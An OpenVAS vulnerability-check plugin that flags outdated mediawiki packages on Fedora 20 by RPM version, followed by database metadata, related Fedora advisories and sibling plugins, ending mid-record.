ID OPENVAS:1361412562310868401 Type openvas Reporter Copyright (C) 2014 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
Check the version of mediawiki
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for mediawiki FEDORA-2014-12263
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Registration block: when the scanner loads the plugin with `description`
# set, only the metadata below is declared and the script exits before any
# host-facing code runs.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.868401");
script_version("$Revision: 14223 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
script_tag(name:"creation_date", value:"2014-10-15 06:02:42 +0200 (Wed, 15 Oct 2014)");
# NOTE(review): the list mixes 2013 and 2014 CVE ids; this file does not show
# which of them the 1.23.5 build itself fixes, so treat it as the advisory's
# cumulative list rather than a per-release changelog.
script_cve_id("CVE-2014-7295", "CVE-2014-2853", "CVE-2014-1610", "CVE-2013-6452",
"CVE-2013-6451", "CVE-2013-6454", "CVE-2013-6453", "CVE-2013-6472");
# A single CVSS v2 score and vector is declared for the whole CVE set above.
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Fedora Update for mediawiki FEDORA-2014-12263");
script_tag(name:"summary", value:"Check the version of mediawiki");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"affected", value:"mediawiki on Fedora 20");
script_tag(name:"solution", value:"Please install the updated package(s).");
# "package" quality-of-detection: the finding comes from the installed RPM
# version, not from probing the running MediaWiki service.
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"FEDORA", value:"2014-12263");
script_xref(name:"URL", value:"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
script_dependencies("gather-package-list.nasl");
# The check is gated on knowledge-base keys for a Fedora SSH login, an RPM
# list and release FC20 (presumably filled in by gather-package-list.nasl).
# Without those keys the detection code is not expected to run, so a missing
# finding on an uncredentialed scan says nothing about the host's patch state.
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC20");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
# Detection phase: compare the installed mediawiki RPM on a Fedora 20 host
# with the fixed build mediawiki-1.23.5-1.fc20.
# Only the RPM package list is consulted; a MediaWiki copy deployed outside
# RPM (for example unpacked from a tarball) is not seen by this check.
release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "FC20")
{
  # isrpmvuln() comes from pkg-lib-rpm.inc; a non-NULL result is passed on
  # as the report text (presumably returned when the installed version is
  # older than the one given in `rpm` - confirm against the library).
  res = isrpmvuln(pkg:"mediawiki", rpm:"mediawiki~1.23.5~1.fc20", rls:"FC20");
  if(res != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  # NOTE(review): __pkg_match looks like a flag set by the library when the
  # package name was found; exit code 99 is then used instead of 0,
  # presumably to record "installed and not vulnerable" - confirm.
  if(__pkg_match)
    exit(99);

  exit(0);
}
{"id": "OPENVAS:1361412562310868401", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for mediawiki FEDORA-2014-12263", "description": "Check the version of mediawiki", "published": "2014-10-15T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868401", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html", "2014-12263"], "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "lastseen": "2019-05-29T18:37:21", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "fedora", "idList": ["FEDORA:D3C0160CE2C3", "FEDORA:9392B60CA53E", "FEDORA:03ECD60DC901", "FEDORA:99FA160CBEF5", "FEDORA:312EC6016164", "FEDORA:68E1360D7018", "FEDORA:1CBA822DA4", "FEDORA:74E4B21C4B", "FEDORA:6D086230EA", "FEDORA:BFF2560CE4A3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310868570", "OPENVAS:1361412562310868575", "OPENVAS:1361412562310867776", "OPENVAS:1361412562310868400", "OPENVAS:1361412562310869260", "OPENVAS:1361412562310868642", "OPENVAS:1361412562310867954", "OPENVAS:1361412562310867951", "OPENVAS:1361412562310867788", "OPENVAS:1361412562310868638"]}, {"type": "cve", "idList": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6454", "CVE-2014-1610", "CVE-2014-7295", "CVE-2014-2853"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31179", "SECURITYVULNS:DOC:30625"]}, {"type": "nessus", "idList": ["MEDIAWIKI_1_19_10.NASL", "FEDORA_2014-12262.NASL", "DEBIAN_DSA-3046.NASL", "FEDORA_2014-12155.NASL", "MEDIAWIKI_1_23_5.NASL", "GENTOO_GLSA-201502-04.NASL", "FEDORA_2014-12263.NASL", "MANDRIVA_MDVSA-2014-057.NASL", "DEBIAN_DSA-2891.NASL", "FEDORA_2014-1745.NASL"]}, {"type": "debian", 
"idList": ["DEBIAN:DSA-2891-3:4C320", "DEBIAN:DSA-2891-1:05758", "DEBIAN:DSA-3046-1:77CE8", "DEBIAN:DSA-2891-2:4C744"]}, {"type": "gentoo", "idList": ["GLSA-201502-04"]}, {"type": "archlinux", "idList": ["ASA-201410-3"]}, {"type": "zdt", "idList": ["1337DAY-ID-21844", "1337DAY-ID-21922", "1337DAY-ID-21845"]}, {"type": "seebug", "idList": ["SSV:85082", "SSV:61437"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125040", "PACKETSTORM:125287"]}, {"type": "thn", "idList": ["THN:14D220C3673BA5820F7A055DC2CB7A3A"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:740983D0417678074247C5AE47DBBED6"]}, {"type": "exploitdb", "idList": ["EDB-ID:31767", "EDB-ID:31329"]}, {"type": "dsquare", "idList": ["E-382"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/MEDIAWIKI_THUMB"]}], "modified": "2019-05-29T18:37:21", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2019-05-29T18:37:21", "rev": 2}, "vulnersScore": 6.9}, "pluginID": "1361412562310868401", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-12263\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868401\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 06:02:42 +0200 (Wed, 15 Oct 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-12263\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12263\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.5~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}
{"fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.8/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-12-29T10:05:00", "published": "2014-12-29T10:05:00", "id": "FEDORA:BFF2560CE4A3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.8-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "modified": "2014-10-14T04:36:28", "published": "2014-10-14T04:36:28", "id": "FEDORA:68E1360D7018", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.5-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-12-12T04:34:24", "published": "2014-12-12T04:34:24", "id": "FEDORA:99FA160CBEF5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.7-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "modified": "2015-04-18T09:37:06", "published": "2015-04-18T09:37:06", "id": "FEDORA:312EC6016164", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.9-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.7/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-12-12T04:24:17", "published": "2014-12-12T04:24:17", "id": "FEDORA:03ECD60DC901", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.7-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "modified": "2014-12-29T10:04:19", "published": "2014-12-29T10:04:19", "id": "FEDORA:D3C0160CE2C3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.8-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.5/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-10-14T04:43:12", "published": "2014-10-14T04:43:12", "id": "FEDORA:9392B60CA53E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.5-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.9/README.RPM. Remember to remove the config dir after completing the configuration. 
", "modified": "2014-05-06T03:34:45", "published": "2014-05-06T03:34:45", "id": "FEDORA:1CBA822DA4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.9-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.10/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-06-10T02:52:13", "published": "2014-06-10T02:52:13", "id": "FEDORA:16DFF2150A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.10-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "modified": "2014-05-06T03:41:21", "published": "2014-05-06T03:41:21", "id": "FEDORA:6D086230EA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.9-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-12-30T00:00:00", "id": "OPENVAS:1361412562310868642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868642", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-17228", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-17228\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868642\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-30 05:58:06 +0100 (Tue, 30 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-17228\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17228\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147173.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-12-12T00:00:00", "id": "OPENVAS:1361412562310868570", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868570", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-16020", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-16020\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868570\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-12 06:00:00 +0100 (Fri, 12 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-16020\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-16020\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145910.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.7~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-12-12T00:00:00", "id": "OPENVAS:1361412562310868575", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868575", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-16033", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-16033\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868575\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-12 06:06:19 +0100 (Fri, 12 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-16033\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-16033\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145969.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
